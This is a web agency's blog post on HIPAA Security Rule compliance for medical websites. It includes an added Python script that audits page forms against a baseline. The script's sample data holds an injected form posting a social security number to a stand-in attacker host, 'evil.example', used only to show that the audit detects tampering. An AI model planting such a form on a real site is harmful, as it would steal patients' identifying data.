If you’re a medical professional you are probably familiar with HIPAA, the Health Insurance Portability and Accountability Act of 1996, and the HIPAA Privacy Rule. However, are you familiar with the HIPAA Security Rule? The Security Standards for the Protection of Electronic Protected Health Information establish national standards that protect electronic protected health information, also known as e-PHI, whenever a covered entity creates, receives, maintains or transmits it. As more medical professionals and healthcare offices build websites, it is important to understand what e-PHI is, how to determine if your site needs to be HIPAA-compliant and the requirements a site must meet in order to be considered a HIPAA-compliant website.
What is e-PHI?
According to the U.S. Department of Health & Human Services, Electronic Protected Health Information (e-PHI) refers to “all individually identifiable health information a covered entity creates, receives, maintains or transmits in electronic form.” What does that mean? If you are a practice that transmits any patient data via your medical website, that’s e-PHI.
This can include:
- Patient names, addresses, phone numbers, social security numbers
- Patient photographs, X-Rays, MRIs
- Past medical records
- Patient payment information and insurance data
- Patient demographics
- Tests and lab results
Does my website need to be HIPAA-compliant?
If you collect any of the above information via your website, yes, you need to have a HIPAA-compliant website. You might collect this information through forms on your medical website that allow patients to schedule appointments, contact their doctor with questions, make payments or send in medical records. The bottom line is that if you’re handling any patient data through your website, you MUST have a HIPAA-compliant website or you will be violating the HIPAA Security Rule. Even if you are not collecting patient data, you should strongly consider making your website HIPAA-compliant. Hosting that meets the requirements of the HIPAA Security Rule (hardened, access-controlled and monitored servers) also reduces the risk that an attacker modifies your site, for example by inserting a fake form that collects patient data such as social security numbers. No hosting arrangement prevents that on its own, so the site content itself should still be monitored for unexpected changes.
How do I know if my site meets the standards of the HIPAA Security Rule?
If you can answer yes to all of the questions below, your medical site probably meets the standards of the HIPAA Security Rule.
- Does your site have automatic backups that are stored securely, retained, and tested so that they can be restored at any time?
- Is all data transmitted from your site, over the Internet, encrypted?
- Is your stored data also encrypted?
- Is your website data accessible only by authorized persons with unique permissions that can be audited?
- If your site is no longer needed, can it and its data be permanently deleted?
- Do you have a HIPAA Business Associate Agreement with the company that currently hosts your website? Any host that stores or can access your patients’ e-PHI is a business associate under HIPAA, so a signed BAA is required in addition to, not instead of, a server that meets the requirements of the HIPAA Security Rule.
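Two of the points above can be checked mechanically: that every form on the site submits over HTTPS, and that no form has appeared that was not part of the site when it was deployed (the inserted fake form described earlier). The script below is an added example, not code from the original article or from Comit Developers. It audits a page’s HTML and response headers with the Python standard library only. The site name clinic.example, the sample HTML, the response headers and the list of field names that hint at e-PHI are all constructed assumptions for illustration.

```python
"""Added example (not from the original article): audit a page's forms for
HIPAA-relevant transport problems and detect forms that are not in a
known-good baseline. All inputs below are constructed sample data."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse
import hashlib
import json

# Heuristic: field names containing these fragments suggest the form collects
# e-PHI. This list is an assumption, not an official HIPAA definition.
PHI_HINTS = ("ssn", "social", "dob", "birth", "insurance", "diagnosis",
             "card", "policy", "patient")


class FormCollector(HTMLParser):
    """Collect each <form> with its resolved action URL, method and field names."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "action": urljoin(self.base_url, a.get("action") or ""),
                "method": (a.get("method") or "get").lower(),
                "fields": [],
            }
        elif tag in ("input", "textarea", "select") and self._current is not None:
            if a.get("name"):
                self._current["fields"].append(a["name"].lower())

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None


def collect_forms(base_url, html):
    parser = FormCollector(base_url)
    parser.feed(html)
    return parser.forms


def form_fingerprint(form):
    """Stable SHA-256 over action, method and sorted field names, for baselining."""
    canon = json.dumps({"action": form["action"], "method": form["method"],
                        "fields": sorted(form["fields"])}, sort_keys=True)
    return hashlib.sha256(canon.encode()).hexdigest()


def build_baseline(base_url, html):
    """Fingerprints of every form on the page as deployed; store these securely."""
    return {form_fingerprint(f) for f in collect_forms(base_url, html)}


def audit_page(base_url, html, headers, baseline=None):
    """Return (finding, subject) tuples. `headers` is the page's response header
    dict; `baseline` is the fingerprint set recorded at deployment time."""
    findings = []
    lower_headers = {k.lower(): v for k, v in headers.items()}
    if not lower_headers.get("strict-transport-security"):
        findings.append(("missing-hsts", base_url))
    site_host = urlparse(base_url).netloc
    for form in collect_forms(base_url, html):
        target = urlparse(form["action"])
        collects_phi = any(h in f for f in form["fields"] for h in PHI_HINTS)
        if target.scheme != "https":
            findings.append(("insecure-action", form["action"]))  # plaintext transit
        if collects_phi and form["method"] != "post":
            findings.append(("phi-in-query-string", form["action"]))  # ends up in logs
        if target.netloc != site_host:
            findings.append(("third-party-action", form["action"]))  # data leaves site
        if baseline is not None and form_fingerprint(form) not in baseline:
            findings.append(("unknown-form", form["action"]))  # possible injected form
    return findings


# Constructed sample data for a hypothetical practice website.
BASE_URL = "https://clinic.example"
DEPLOYED_HTML = ('<form action="/appointments" method="post">'
                 '<input name="patient_name"><input name="dob"></form>')
TAMPERED_HTML = DEPLOYED_HTML + (
    '<form action="http://evil.example/collect" method="get">'
    '<input name="ssn"></form>')
HEADERS_NO_HSTS = {"Content-Type": "text/html"}


def demo():
    """Audit the tampered page against the baseline taken from the deployed page."""
    baseline = build_baseline(BASE_URL, DEPLOYED_HTML)
    return audit_page(BASE_URL, TAMPERED_HTML, HEADERS_NO_HSTS, baseline)


if __name__ == "__main__":
    for finding, subject in demo():
        print(f"{finding}: {subject}")
```

Run it against a real site by fetching the page and its headers (for example with `urllib.request`) and storing the baseline fingerprints somewhere the web server itself cannot write to, so that an attacker who modifies the site cannot also update the baseline.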
Ready to Get Started?
Comit Developers is well-versed in the requirements surrounding the HIPAA Security Rule and our team has put in countless hours researching the best solutions available in order to provide our healthcare clients with secure, HIPAA-compliant websites. As a result, we have successfully launched several sites in the medical industry for doctors, surgeons and providers of medical equipment utilizing HIPAA-compliant servers. In addition, several members of our team have taken the time to research and stay updated with the HIPAA Privacy and Security Rules.
To work with a professional team, well-versed in providing HIPAA-compliant websites, call us at 337-326-5479 to get started!